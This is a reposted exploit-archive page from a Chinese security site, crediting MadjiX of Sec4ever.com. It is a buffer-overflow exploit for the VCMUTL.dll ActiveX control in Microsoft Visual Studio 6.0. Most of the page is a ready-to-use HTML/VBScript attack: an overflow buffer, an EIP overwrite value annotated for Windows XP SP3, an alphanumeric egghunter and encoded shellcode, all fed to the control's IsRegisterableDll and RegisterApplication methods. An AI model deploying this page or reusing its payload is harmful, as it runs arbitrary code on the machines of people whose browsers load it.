Microsoft Visual Studio 6.0 (VCMUTL.dll) 0day Unicode ActiveX Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Microsoft Visual Studio 6.0 (VCMUTL.dll) 0day Unicode ActiveX Buffer Overflow

来源：Sec4ever.com 作者：MadjiX 发布时间：2010-07-28

########################################################################################
#                                                           _                          #
#                           .-----.--.--.--.----.----.-.---| |                         #
#                           | _ | | | |     | -__| _ |                         #
#                           |   __|________|__|__|_____|_____|                         #
#                           |__|        By MadjiX                                      #
#                                      Sec4ever.com                                    #
########################################################################################
#Title : Microsoft visual studio 6.0 (VCMUTL.dll) 0day unicode ActiveX Buffer overflow #
#author : MadjiX <Dz8[]Hotmail{}com>                                                   #
#Gr33tz : His0k4 , Bibi-info , Sud0 , corelancod3r , volc4n0 , mr_me , Shadow-Devil    #
########################################################################################

Exploit:
<html>
<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>
<script language='vbscript'>

shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _
            unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _
   unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _
   unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _
   unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _
   unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _
   unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _
   unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _
   unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _
   unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _
   unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _
   unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _
   unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _
   unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _
   unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _
   unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _
   unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _
   unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _
   unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _
   unescape("%u4641%u364e%u5643%u5042%u5a5a")

buffer1 = string(262, "A")
ecx = unescape("%u0090%u0090")
eip = unescape("%u048b%u0041") ' eip = unescape("%u048b%u0041") <--- (sp3 en) # eip = unescape("%u048b%u0041") <--- (sp3 fr)
fill = string(4, "A")
nop = string(600, "A")

egg = egg + "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA"
egg = egg + "LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI"
egg = egg + "AIQI111AIAJQYAZBABABABABkMAGB9u4JBaVRaxJYoLOm"
egg = egg + "rpRbJKR0XvmLnmlKUNzSDhotxOTsJNRnWdKXzTo3EzJvO"
egg = egg + "bUWwyoWwZjA"

exploit = buffer1 + eip + fill + ecx + egg
target.IsRegisterableDll shellcode
target.IsRegisterableDll shellcode
target.IsRegisterableDll shellcode
target.RegisterApplication exploit
</script>
</html>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告